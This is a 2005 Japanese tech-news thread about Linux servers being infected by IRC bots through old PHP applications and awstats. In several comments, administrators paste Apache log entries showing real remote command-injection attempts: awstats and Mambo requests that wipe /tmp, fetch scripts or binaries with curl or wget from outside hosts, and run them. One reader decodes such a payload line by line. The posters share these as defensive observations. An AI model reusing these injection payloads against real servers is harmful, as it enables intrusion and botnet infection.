Linuxでもbot感染が拡大

Linuxでもbot感染が拡大 56

ストーリー by yoosee 2005年12月30日 13時13分
メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より

あるAnonymous Coward曰く、"日経ITProの記事によると、米SANS InstituteがLinuxに感染するbotを複数確認したと発表したらしい。多くの場合、phpアプリケーションのセキュリティホールを突いて感染を広げているようで、複数の脆弱性に対する攻撃手段を持ったものが増えているそうだ。
また、同じ記事でNANOGのMLに投稿されたLinuxによるbotnetのDDoS攻撃の報告も紹介されており、それによるとピーク時で6Gb/sものDDoS攻撃のトラフィックを出したという。

実はこの話、海の向こうだけ話ではない。ITProの記事では何故か触れられていないが、このbotnetの指令サーバは日本にホスティングされており、bot感染ホストの一部には日本のサーバが含まれているのだ。botのIPアドレスリストも掲載されているので、自分の関わるサーバが含まれていないか、または含まれていなくても怪しいIRC通信がサーバから行われていないか確認してみよう。"

この議論は賞味期限が切れたので、アーカイブ化されています。新たにコメントを付けることはできません。

記事ページを表示すべてのコメント取得

検索56コメント Log In/Create an Account

perlとかもあるよ (スコア:3, 参考になる)

by Anonymous Coward on 2005年12月30日 14時51分 (#857373)

最近でも頻繁に古いphpベースのCMSにあったxmlrpc.phpとかログ解析ソフトawsatats.plの古い版とか狙ったbot感染攻撃が後をたたないでちゅ。linuxサーバーに入っているwgetを使ってshellbotをダウンロードする手口が共通に使われているのでwget消すかrenameしておくと将来的にも安心かも。
- Re:perlとかもあるよ (スコア:2, 参考になる)
  
  by nonolin (465) on 2005年12月30日 15時51分 (#857404)
  
  某セキュリティ系セミナーで
  cacti （これも php）の古いヴァージョンのセキュリティホール突っついて、
  侵入・クラックするデモを見たときも、wget でダウンロードしてました。
  
  手動でクラックしてるわけではなくて、
  スクリプトで流し込んで実行してるから
  その手のある意味、姑息な対応策も有効なんでしょうけど、
  まー、本質的ではないですね。
  
  ＃テクニカルサポートのエンジニアで wget とか lynx を
  ＃知らない奴が居て、よくそれでやってるナーと感心したことがあります。
  
  シェア
  
  親コメント
- Re:perlとかもあるよ (スコア:2, 参考になる)
  
  by Anonymous Coward on 2005年12月30日 16時42分 (#857423)
  
  うちにも毎日来ます:-(
  たとえばapacheにこんなログが。
  
  SERVER XX.XXX.XXX.XX - - [20/Sep/2005:08:30:05 +0900] \
  "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;\
  rm%20-rf%20*;curl%20-O%20http://www.geoXXXXXX.com\
  /h4x000r/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;\
  echo| HTTP/1.1" 404 472
  
  おそらくこんな感じ?
  
  echo ;
  cd /tmp;
  rm -rf *;
  curl -O http://www.geoXXXXXX.com/h4x000r/a.pl;
  perl a.pl;
  echo ;
  rm -rf a.pl*;
  echo |
  
  xmrpc.php(これも毎日来てます)については良く知らないので
  どなたかよろしく。
  
  # 合わせ技らしいアタックもブログに書いたはずだけど、どこいった...
  
  シェア
  
  親コメント
  - Re:perlとかもあるよ (スコア:1, 参考になる)
    
    by Anonymous Coward on 2005年12月30日 17時32分 (#857461)
    
    xmlrpc.phpですね。
    
    ぐぐると色々出てきますね。
    勉強になります。
    うちはawstats.plの方しか来たこと無いですけど・・・
    
    シェア
    
    親コメント
結局中の人が最大のセキュリティホール (スコア:3, 興味深い)

by niratama (2175) on 2005年12月30日 18時10分 (#857472) ホームページ日記

「Windowsはセキュリティに問題があるけどLinuxなら安心」みたいな安直な考えでLinuxを使ってるヤツが多いんだろうな。
Linuxを勧める側も、相手をみて勧めるべきか考えた方がいい時期にきているのかも。
＃まあWindowsだってバカには使いこなせない訳だが。
- 放置されてるだけじゃないの？ (スコア:4, おもしろおかしい)
  
  by Anonymous Coward on 2005年12月30日 23時58分 (#857568)
  
  ある日、森の中を散歩していたら、2人の狩人さんに出会いました。
  
  私「狩人さんは、Linux機を自慢しているのに、どうしていつもWin機をいじってるの？
  
  狩人さんA「それはえろげー♪(sing
  
  狩人さんB「それはえろげー♪(sing
  
  狩人さんA&B「それはえろげが、好・き・だ・か・らさ～♪(chorus
  
  私「なるほどぉ。
  
  シェア
  
  親コメント
  - Re:放置されてるだけじゃないの？ (スコア:0)
    
    by Anonymous Coward
    
    ごめんなさい、ネットゲーも入れて下さい orz
    ＃結局はパンピーが使いたいアプリケーションが多い方の勝ちでしょ
メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:2, すばらしい洞察)

by Anonymous Coward on 2005年12月30日 13時16分 (#857322)

あつ
どうメンテナンスすればLinuxサーバが良くなるのかわからない部門が多い事
- Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:2, 参考になる)
  
  by nonolin (465) on 2005年12月30日 13時44分 (#857333)
  
  > 多くの場合、phpアプリケーションのセキュリティホールを突いて感染を広げているようで、複数の脆弱性に対する攻撃手段を持ったものが増えているそうだ。
  
  脆弱性が公開されてて、幅広く使われてるのは
  phpBB とか Pukiwiki 系ぐらいかな。
  
  phpBB って /. 以上に閲覧しにくいのだけど、なんで海外で流行ってんだろうか。
  スレッドフロート型の殆ど見かけないよね。
  
  シェア
  
  親コメント
  - Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:3, 参考になる)
    
    by kitsune.info (18329) on 2005年12月30日 14時43分 (#857371) ホームページ
    
    phpBB って /. 以上に閲覧しにくいのだけど、なんで海外で流行ってんだろうか。
    
    リンクや引用など必要最低限のマークアップができる自由度と、（投稿者にとっての）UI のわかりやすさが「ちょうどいいバランス」なんじゃないですかね。ほどよく親しみやすいというか。
    
    ただ、設置したり管理する側から見ると、設計がかなり行き当たりばったりという感があります。
    MOD（おそらく module の略）で機能拡張できるのはいいんだけど、内部の実装がちゃんとモジュール化されていないので、module　とは名ばかりで実際にはコアファイルの変更が必要なことがほとんどです。
    つまり事実上パッチなわけで、おかげでバージョンアップのたびに MOD を入れなおさなければならないことが多々あります。
    
    もうちょっと美しくてセキュアな類似品が出てきたら、わりと勢力図が一変してしまうかも知れません。
    # というか、出てきてくれないと困るくらい流行っちゃってる。
    
    --
    [わかってもらうことは難しい。わかってあげることは、もっと難しい。]
    
    シェア
    
    親コメント
    - Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1, 参考になる)
      
      by Anonymous Coward on 2005年12月30日 15時17分 (#857383)
      
      > MOD（おそらく module の略）
      modificationの類では？
      これ [hatena.ne.jp]と同じような感じで
      
      シェア
      
      親コメント
      - Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1)
        
        by kitsune.info (18329) on 2005年12月30日 16時47分 (#857432) ホームページ
        
        あ、そうかも。それなら納得がいくかもです。
        # 実装がひどいという評価は変わんないけど :-P
        
        脳内で #857383 に「参考になる」と moderate しますた。
        
        --
        [わかってもらうことは難しい。わかってあげることは、もっと難しい。]
        
        シェア
        
        親コメント
  - Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1, 興味深い)
    
    by Anonymous Coward on 2005年12月30日 14時52分 (#857374)
    
    >脆弱性が公開されてて、幅広く使われてるのは
    >phpBB とか Pukiwiki 系ぐらいかな。
    
    Pukiwikiにワーム感染するようなバグありましたっけ?
    
    先月からXMLRPCのワーム、今月はMambo, Coppermine, PHPBBのワームが活動している事は知っていますがPukiwikiにワームに感染するバグがあるとは知りませんでした。
    
    シェア
    
    親コメント
    - Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1)
      
      by nonolin (465) on 2005年12月30日 15時36分 (#857393)
      
      あー、確かにワームではないね。
      
      シェア
      
      親コメント
      - Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1)
        
        by heno (10869) on 2005年12月30日 23時20分 (#857551) 日記
        
        では拡散(感染したところから拡大)するのですか?
        
        ＃ここでのやりとりに問題があるならば
        ＃開発メンバーに直接メールして下さい
        ＃http://osdn.jp/projects/pukiwiki/
        
        シェア
        
        親コメント
        
        Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:2, 参考になる)
        
        by heno (10869) on 2005年12月31日 19時55分 (#857817) 日記
        
        話が終わっているかもしれませんが補足を (^^;
        
        http://pukiwiki.osdn.jp/?PukiWiki/Errata
        
        最近のPukiWikiの脆弱性に関する情報はこちらで
        公開していますが、内容はどれもXSSに関するもので
        「サーバーの侵害」を直接実現する類のものでは
        ありません。
        
        問題のあるバージョンと回避策などは記載する通り
        ですので、該当するバージョンをお使いの方は
        各自対応をお願いします。
        (※バージョンが古いから管理者が何もやっていない、
        ということにはなりません)
        
        添付ファイル機能の操作を "第三者に公開すること"
        については、XSS脆弱性に関連して、現在では禁止する
        ことを推奨しています。(See Errata)
        
        また、現時点でPukiWikiはPEAR XML-RPC パッケージを
        使用していませんので、その脆弱性の話題は
        関係ありません。
        
        シェア
        
        親コメント
結構壮観だな (スコア:2, 興味深い)

by Anonymous Coward on 2005年12月31日 1時05分 (#857586)

http://www.lancard.com/archives/20050517ShellBOTers.png [lancard.com]
このうち何台ぐらいがLinuxだったんだろうねえ
うちのサーバーの場合 (スコア:2, 参考になる)

by romfffrom (17979) <fedoradesktop@yahoo.co.jp> on 2005年12月31日 12時03分 (#857701) ホームページ

うちのサーバーのログを見ると、awstatsとphp関係の
アプリを探しているのが多いですね。

[client 12.154.116.27] client denied by server configuration: /var/www/empty/awstats
[client 12.173.145.178] client denied by server configuration: /usr/lib/cgi-bin/awstats
[client 12.173.145.178] client denied by server configuration: /usr/lib/cgi-bin/awstats.pl
[client 12.173.145.178] client denied by server configuration: /var/www/empty/awstats
[client 12.173.145.178] client denied by server configuration: /var/www/empty/blog
[client 12.173.145.178] client denied by server configuration: /var/www/empty/blogs
[client 12.173.145.178] client denied by server configuration: /var/www/empty/drupal
[client 12.173.145.178] client denied by server configuration: /var/www/empty/phpgroupware
[client 12.173.145.178] client denied by server configuration: /var/www/empty/wordpress
[client 12.173.145.178] client denied by server configuration: /var/www/empty/xmlrpc
[client 12.173.145.178] client denied by server configuration: /var/www/empty/xmlrpc.php
[client 12.173.145.178] client denied by server configuration: /var/www/empty/xmlsrv
[client 149.156.116.238] client denied by server configuration: /var/www/empty/Forums
[client 149.156.116.238] client denied by server configuration: /var/www/empty/admin_styles.phpadmin_styles.php
[client 149.156.116.238] client denied by server configuration: /var/www/empty/modules
[client 200.27.221.5] client denied by server configuration: /usr/lib/cgi-bin/awstats
[client 200.27.221.5] client denied by server configuration: /usr/lib/cgi-bin/awstats.pl
[client 200.27.221.5] client denied by server configuration: /var/www/empty/awstats
[client 200.27.221.5] client denied by server configuration: /var/www/empty/cvs
[client 200.27.221.5] client denied by server configuration: /var/www/empty/index.php
[client 200.27.221.5] client denied by server configuration: /var/www/empty/index2.php
[client 200.27.221.5] client denied by server configuration: /var/www/empty/mambo
[client 219.202.188.32] client denied by server configuration: /usr/lib/cgi-bin/awstats
[client 219.202.188.32] client denied by server configuration: /usr/lib/cgi-bin/awstats.pl
[client 219.202.188.32] client denied by server configuration: /var/www/empty/awstats
[client 219.202.188.32] client denied by server configuration: /var/www/empty/blog
[client 219.202.188.32] client denied by server configuration: /var/www/empty/blogs
[client 219.202.188.32] client denied by server configuration: /var/www/empty/drupal
[client 219.202.188.32] client denied by server configuration: /var/www/empty/phpgroupware
[client 219.202.188.32] client denied by server configuration: /var/www/empty/wordpress
[client 219.202.188.32] client denied by server configuration: /var/www/empty/xmlrpc
[client 219.202.188.32] client denied by server configuration: /var/www/empty/xmlrpc.php
[client 219.202.188.32] client denied by server configuration: /var/www/empty/xmlsrv
[client 38.116.11.34] client denied by server configuration: /var/www/empty/cvs
[client 38.116.11.34] client denied by server configuration: /var/www/empty/index.php
[client 38.116.11.34] client denied by server configuration: /var/www/empty/index2.php
[client 38.116.11.34] client denied by server configuration: /var/www/empty/mambo
[client 38.116.11.34] client denied by server configuration: /var/www/empty/php
[client 61.19.121.46] client denied by server configuration: /var/www/empty/cvs
[client 61.19.121.46] client denied by server configuration: /var/www/empty/index.php
[client 61.19.121.46] client denied by server configuration: /var/www/empty/index2.php
[client 61.19.121.46] client denied by server configuration: /var/www/empty/mambo
[client 61.19.121.46] client denied by server configuration: /var/www/empty/php
[client 61.220.239.227] client denied by server configuration: /usr/lib/cgi-bin/awstats
[client 61.220.239.227] client denied by server configuration: /usr/lib/cgi-bi

--
romfffromのコメント設定
AC-2、プラスモデ+3、閾値0、スコアを表示しない(推奨)、高い評価のコメントを親にする

続きを読む...
access_logの一部 (スコア:2, 参考になる)

by inosisibeyan (24832) <reversethis-{moc ... } {nayebisisoni}> on 2006年01月02日 13時45分 (#858268) ホームページ日記

私の家のサーバでも来ていました。

#cat access_log.2 | grep php | nl > con #less con #その一部を引用 326 66.232.153.99 - - [25/Dec/2005:03:20:34 +0900] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC onfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01. 1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 327 66.232.153.99 - - [25/Dec/2005:03:20:35 +0900] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC onfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01. 1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" #cat access_log.2 | grep pl | nl > con2 #less con2 #その一部を引用 88 195.74.109.37 - - [24/Dec/2005:19:40:36 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48% 2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 ;)" 89 195.74.109.37 - - [24/Dec/2005:19:40:38 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e1 36%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Window s NT 5.1;)" (END)
流行っているようですね。
- Re:access_logの一部 (スコア:0)
  
  by Anonymous Coward
  
  こういうのは日記に書いてリンク張りなよ
  - Re:access_logの一部 (スコア:1)
    
    by inosisibeyan (24832) <reversethis-{moc ... } {nayebisisoni}> on 2006年01月04日 7時32分 (#858745) ホームページ日記
    
    コメントありがとう。以後そうしたいと思います。これでも、一応削った方なのですが。
    
    シェア
    
    親コメント
    - Re:access_logの一部 (スコア:0)
      
      by Anonymous Coward
      
      削る削らんより、Firefoxで見てみな、この親コメント。
      - Re:access_logの一部 (スコア:1)
        
        by inosisibeyan (24832) <reversethis-{moc ... } {nayebisisoni}> on 2006年01月06日 19時25分 (#860593) ホームページ日記
        
        Firefoxで見ました。どうやらフォント表示を縮小して、
        初めてまともに見れるようです。了解です。
        
        シェア
        
        親コメント
        
        Re:access_logの一部(オフトピ) (スコア:1)
        
        by witch (3127) on 2006年01月13日 12時02分 (#863965) 日記
        
        IEの標準フォント設定がでかすぎるだけだと思うんだけど…
        (IEが最大派閥になってしまったから仕方がないのか)
        
        シェア
        
        親コメント
なにをいまさら.... (スコア:1, すばらしい洞察)

by Anonymous Coward on 2005年12月30日 13時58分 (#857341)

php系のワームとかawstatsのとか、かなり前から死ぬほどアタック来てるだろうに....
IDSとか入れないんか？
- Re:なにをいまさら.... (スコア:2, 興味深い)
  
  by TameShiniTotta (19794) on 2005年12月30日 14時05分 (#857349)
  
  今までWindowsで散々言われてきたことが、
  Linuxで全く同じことが起きている、
  ってことだと思いますよ。
  
  それを「Linuxも所詮は糞（ｒｙ」と思うのか、
  「Linuxも随分と普及してきたもんだなあ」と思うのかは、
  人それぞれだと思いますが。
  
  シェア
  
  親コメント
  - Re:なにをいまさら.... (スコア:2, おもしろおかしい)
    
    by nue-nubata (28218) on 2005年12月30日 15時18分 (#857384) ホームページ
    
    むしろ、よくわかっていないシステム管理者に色々売り込むビジネスチャンスと思います。
    
    # いやービルの支えになる鉄骨までワームにやられてます。
    # 一応ワクチンをバラまいときましたが、これは根本的にリフォームしないといつビルが倒壊するか分かりませんよ。
    
    シェア
    
    親コメント
    - ビルなんていうから(スコア:-1, オフトピック) (スコア:0)
      
      by Anonymous Coward
      
      「窓ががたがたですね。交換しましょう」って方の話かと思った。
      「ビルの門からして既にいかれてます」とか。
      - Re:ビルなんていうから(スコア:-1, さらにオフトピ) (スコア:1)
        
        by myzn (1265) on 2005年12月31日 11時29分 (#857691)
        
        「あー、窓多すぎるし使ってる人多過ぎなんで、いっぺんに交換するのは無理ですね」
        「じゃあ段階的に入れ替える事にしますか」
        「そうですね。窓は残したまま、先ずはビルだけ撤去しましょう」
        
        # どういう工法？になるか見てみたい
        
        シェア
        
        親コメント
        
        Re:ビルなんていうから(スコア:-1, さらにオフトピ) (スコア:2, おもしろおかしい)
        
        by __hage (7886) on 2005年12月31日 17時32分 (#857790)
        
        チェシャ猫工法ですよね。
        
        シェア
        
        親コメント
  - Re:なにをいまさら.... (スコア:1, すばらしい洞察)
    
    by Anonymous Coward on 2005年12月30日 16時38分 (#857420)
    
    > 「Linuxも所詮は糞（ｒｙ」と思うのか、
    > 「Linuxも随分と普及してきたもんだなあ」と思うのか
    
    OSなんか知ったこっちゃねえから、頼むからワーム対策くらいはしやがれ、と思います。
    Linuxだからとかphpだからとか関係ありません。ええ。ワームにかかるような奴は全員回線切れ。
    
    # なんかみんなが帰ってご飯食べてPC付けるタイミングで
    # アタックが増えるんだよね。何故だろう、何故かしら
    
    シェア
    
    親コメント
  - Re:なにをいまさら.... (スコア:0)
    
    by Anonymous Coward
    
    ところでWindowsでは選り取りみどりのウイルス・チェック等の
    セキュリティ関連ツールはLinuxには無いんですかね？　
    
    自分で細かい設定出来なくて，ネットワーク関係がデフォルトの
    設定のままになってるLinuxに出来合のパーソナル・ファイアー
    ウォール入れるなんて時代になるのかも...........
    それはそれでLinuxが普及したもんだと言えるのかな？
    - Re:なにをいまさら.... (スコア:4, 参考になる)
      
      by Anonymous Cat (27860) on 2005年12月30日 17時32分 (#857460)
      
      ウイルス対策なら
      ClamAVのページ [osdn.jp]
      BitDefender Linux Edition [bitdefender.com]
      Linux / FreeBSD / Solaris - AntiVir PersonalEdition Classic [free-av.com]
      
      ルートキット対策なら
      chkrootkit [chkrootkit.org]
      Rootkit Hunter [rootkit.nl]
      # alamo はどこにいったのか見つかりませんでした・・・
      
      パーソナル・ファイアーウォールは iptables がありますし。
      Firestarterでファイアウォール設定をGUI化 [atmarkit.co.jp]
      で紹介されている、Firestarter 等のGUIフロントエンドもあります。
      
      足りないのはよくまとまっている日本語の情報ページや
      「Linux でもセキュリティ・ホールを放置すれば侵入される」という危機感、でしょうかね。
      
      --
      単なる臆病者の Anonymous Cat です。略してACです。
      
      シェア
      
      親コメント
- Re:なにをいまさら.... (スコア:1, 興味深い)
  
  by Anonymous Coward on 2005年12月30日 23時27分 (#857558)
  
  >IDSとか入れないんか？
  
  IDSの箱だけ設置して安心（シグネチャは古いまま放置）してるところは
  ちっとも珍しくない。
  
  シェア
  
  親コメント
  - Re:なにをいまさら.... (スコア:1, 興味深い)
    
    by Anonymous Coward on 2005年12月31日 3時32分 (#857622)
    
    さらにIDSを入れたがIPSはなく、IDSのレポートを誰も見てないところも
    ちっとも珍しくない。
    
    シェア
    
    親コメント
念のためにと (スコア:1)

by Anonymous Powered (12649) on 2005年12月31日 5時00分 (#857630) 日記

一応IPアドレスリストを眺めてみました。
なんと言うか、合格発表とか宝くじの当選番号を調べる気分になった私です。

Xoopsとか狙われそうだし気をつけよう…。
Linux を使わなければいい (スコア:0, 荒らし)

by Anonymous Coward on 2005年12月30日 14時21分 (#857359)

いいかげんに目を覚まそう。 [srad.jp]
忘れ物をお届けにまいりました (スコア:0, すばらしい洞察)

by Anonymous Coward on 2005年12月30日 14時38分 (#857367)

セキュリティホールが浜の真砂の如く尽きない感もあるLinuxですが
アホくさ (スコア:0, フレームのもと)

by Technical Type (3408) on 2005年12月30日 15時40分 (#857396)

これって、Linux 等で動くPHPアプリケーションにセキュリティ・ホールがあるという話でしょ？　話を故意に混同して「Linux だって弱いんだ～！」って大喜びしなくてもねぇ、、、
じゃ、私がセキュリティを考えずに Windows で動くプログラムを作り、それを動かしたらWindows のセキュリティーは低いという結論になるわけですね、 /. 読者は。
- Re:だから、 (スコア:3, 参考になる)
  
  by shumiyao (17941) <reversethis-{moc.an} {ta} {an}> on 2005年12月30日 16時48分 (#857433) ホームページ
  
  当然ながら、こういう流れも期待しております。
  
  １＞最近Linuxをとりあえず入れとけ的な、右も左も分らない初心者層が増えて来た。
  ２＞ロクにメンテもされていない常時接続されているLinuxマシンが多くなってきた事も、原因の一つと思われる
  ３＞どうすれば、こういったユーザ層に対してセキュリティ啓発を出来るか・具体的に（／。読者として）どういった対策を取る事が出来るか・ディストリビューション側に何か働きかける事は無いか（等
  
  シェア
  
  親コメント
- Re:アホくさ (スコア:3, すばらしい洞察)
  
  by Anonymous Cowerd (24277) on 2005年12月30日 23時21分 (#857552)
  
  これって、Linux 等で動くPHPアプリケーションにセキュリティ・ホールがあるという話でしょ？　話を故意に混同して「Linux だって弱いんだ～！」って大喜びしなくてもねぇ、、、
  
  そのような考えを持つ者が周囲にLinuxを推奨しておいて、後の面倒を見ずに中途半端に放置するからこのような事態になっているわけですよね。
  LinuxだからとかWindowsだからとかいう問題ではなく、LinuxだってWindowsと同じように狙われていて、現在機能するbotnetが実際にLinuxサーバを用いて作られているという話なのに、すぐイデオロギーの話に摩り替えて誤魔化してしまう。
  
  Linuxサーバに侵入する穴が何なのかはとりあえず横に置いておいて、今回問題なのはLinuxで動作するbotが大量に出回っているということです。
  さらに悪いことに、botが動作していて攻撃に使われていると通報を入れても放置されているという状況があるわけです。
  もしあなたのような考えを持つエセ管理者が大量にいるとしたら、そして掲載されたbotnetに含まれるサーバ管理者がそのような考えを持っているとしたら、いつ、どこのネットワークが6GbpsのDDoSを喰らっても防ぐことはできないでしょうし、なくならないでしょうね。
  
  もし自分がオリジナルのbotnetを作ろうと思ったら、狙うのはLinux環境だと思います。
  探せばbotに使えそうなコードがオープンソースでいくらでもありますし、Windowsと違ってアンチウィルスソフトウェアの導入も少ない上に、固定IPで２４時間運用されているサーバが多いですから。
  
  ところでPHPアプリケーションの脆弱性だけしか考えていないようですが、botnetによる攻撃を確認・調査したProlexic Technologies社のBarrett Lyon氏は、 "We are not sure of the current infection method but it must be a common Redhat Linux vulnerability." と述べています。
  おそらく各ゾンビマシン(bot)を逆にスキャンしたのでしょうけど。
  
  シェア
  
  親コメント
- Re:アホくさ (スコア:2, すばらしい洞察)
  
  by kitsune.info (18329) on 2005年12月30日 16時56分 (#857438) ホームページ
  
  ま、確かに原因は PHP アプリケーション側のサニタイズが不十分だってことが多いのですが。
  Apache + PHP がデフォルトで動くようになっているディストリビューションがあるわけですから、OS 単位じゃなくてもディストリビューション単位で論じる値打ちはあるかも知れませんよ。
  
  ActiveX に脆弱性がある Windows は……やっぱり危険でしょ？
  
  --
  [わかってもらうことは難しい。わかってあげることは、もっと難しい。]
  
  シェア
  
  親コメント
- Re:アホくさ (スコア:1, すばらしい洞察)
  
  by Anonymous Coward on 2005年12月30日 23時37分 (#857561)
  
  簡単な結論としては、脆弱性を抱えるのはOSに依存する割合より人に依存する割合の方が圧倒的に高い。という事でしょう。
  
  きちんと管理できる人であれば、Linuxであろうと、Windowsであろうと安全でしょう。
  管理できなければOSを問わず危険だとは思いませんか？
  
  シェア
  
  親コメント
- Re:アホくさ (スコア:0)
  
  by Anonymous Coward
  
  あー、LINUXでも悪意のあるコードが実行できるそして現にそれが拡大しつつあるということを言っているんだろうあと、安全であるという確固たる証明があまりされていないのもねぇ LINUXって生まれてから今まででどの位セキュリティアップデートしてるっけ…
結局 (スコア:0)

by Anonymous Coward on 2005年12月30日 23時47分 (#857564)

やることやらない奴ぁ、Windows だろうが Linux だろうが Mac OS X だろうが何を使ってもダメというこったな。こういうやつらには W-ZERO3 とか iPAQ でもやっとけ、というふうにならんかね...

--
内部にある「管理不行届サーバ」の管理者に悩まされる管理者
LinuxBOXの数 (スコア:0)

by Anonymous Coward on 2005年12月31日 1時29分 (#857594)

そんなに増えてるんでしょうか
サーバ用途なら*BSDって伝説は既に過去のもの？

# とか言いつつうちのサーバはLinuxなんですけどね
- Re:LinuxBOXの数 (スコア:2, 参考になる)
  
  by myzn (1265) on 2005年12月31日 11時16分 (#857688)
  
  宣伝の効果だと思いますが、最近は俗に言うエンタープライズ級サーバなら
  Linuxの方に分があるように感じます。
  
  *BSDでも同等の事は出来るんでしょうけど、雑誌やWebで
  目に付くのはLinuxの方が多いと思います。
  
  一方で、中古のノートPCにデスクトップ環境を作ろうと、
  いくつかのLinuxディストリビューションを試してみましたが
  サウンド・ビデオ・PCカード・内蔵無線LANを上手くハンドリング出来るものは
  意外に少なく、ダメ元でFreeBSDを入れてみると、かなりマトモに動いてしまったので
  デスクトップ用途ならFreeBSDか？とも思ったり。
  
  # サスペンド/レジュームが動かなかったので Ubuntu に落ち着きましたが
  
  シェア
  
  親コメント
- いいかげんで目をさませよ (スコア:0)
  
  by Anonymous Coward
  
  パソコンを使わなければいいのに。
  - Re:いいかげんで目をさませよ (スコア:1)
    
    by oku (4610) on 2005年12月30日 18時22分 (#857474) 日記
    
    WAN につながなければいいのに。
    # LAN 内では偉い人に怒られてください。
    
    シェア
    
    親コメント
    - Re:いいかげんで目をさませよ (スコア:2, 興味深い)
      
      by Anonymous Coward on 2005年12月30日 21時17分 (#857513)
      
      # LAN 内では偉い人に怒られてください。
      
      LAN内ではかえって偉い人のほうがウイルスやらワームやらに引っかかりやすかったり・・・
      どことは言いませんが東証一部上場の大企業の社長さんの私有PCがウイルスに感染していて社内が混乱した経験が・・・
      
      シェア
      
      親コメント

より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。

Linuxでもbot感染が拡大 More ログイン

perlとかもあるよ (スコア:3, 参考になる)

Re:perlとかもあるよ (スコア:2, 参考になる)

Re:perlとかもあるよ (スコア:2, 参考になる)

Re:perlとかもあるよ (スコア:1, 参考になる)

結局中の人が最大のセキュリティホール (スコア:3, 興味深い)

放置されてるだけじゃないの？ (スコア:4, おもしろおかしい)

Re:放置されてるだけじゃないの？ (スコア:0)

メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:2, すばらしい洞察)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:2, 参考になる)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:3, 参考になる)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1, 参考になる)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1, 興味深い)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:1)

Re:メンテナンスされていないLinuxサーバほど質が悪いものは無い部門より (スコア:2, 参考になる)

結構壮観だな (スコア:2, 興味深い)

うちのサーバーの場合 (スコア:2, 参考になる)

access_logの一部 (スコア:2, 参考になる)

Re:access_logの一部 (スコア:0)

Re:access_logの一部 (スコア:1)

Re:access_logの一部 (スコア:0)

Re:access_logの一部 (スコア:1)

Re:access_logの一部(オフトピ) (スコア:1)

なにをいまさら.... (スコア:1, すばらしい洞察)

Re:なにをいまさら.... (スコア:2, 興味深い)

Re:なにをいまさら.... (スコア:2, おもしろおかしい)

ビルなんていうから(スコア:-1, オフトピック) (スコア:0)

Re:ビルなんていうから(スコア:-1, さらにオフトピ) (スコア:1)

Re:ビルなんていうから(スコア:-1, さらにオフトピ) (スコア:2, おもしろおかしい)

Re:なにをいまさら.... (スコア:1, すばらしい洞察)

Re:なにをいまさら.... (スコア:0)

Re:なにをいまさら.... (スコア:4, 参考になる)

Re:なにをいまさら.... (スコア:1, 興味深い)

Re:なにをいまさら.... (スコア:1, 興味深い)

念のためにと (スコア:1)

Linux を使わなければいい (スコア:0, 荒らし)

忘れ物をお届けにまいりました (スコア:0, すばらしい洞察)

アホくさ (スコア:0, フレームのもと)

Re:だから、 (スコア:3, 参考になる)

Re:アホくさ (スコア:3, すばらしい洞察)

Re:アホくさ (スコア:2, すばらしい洞察)

Re:アホくさ (スコア:1, すばらしい洞察)

Re:アホくさ (スコア:0)

結局 (スコア:0)

LinuxBOXの数 (スコア:0)

Re:LinuxBOXの数 (スコア:2, 参考になる)

いいかげんで目をさませよ (スコア:0)

Re:いいかげんで目をさませよ (スコア:1)

Re:いいかげんで目をさませよ (スコア:2, 興味深い)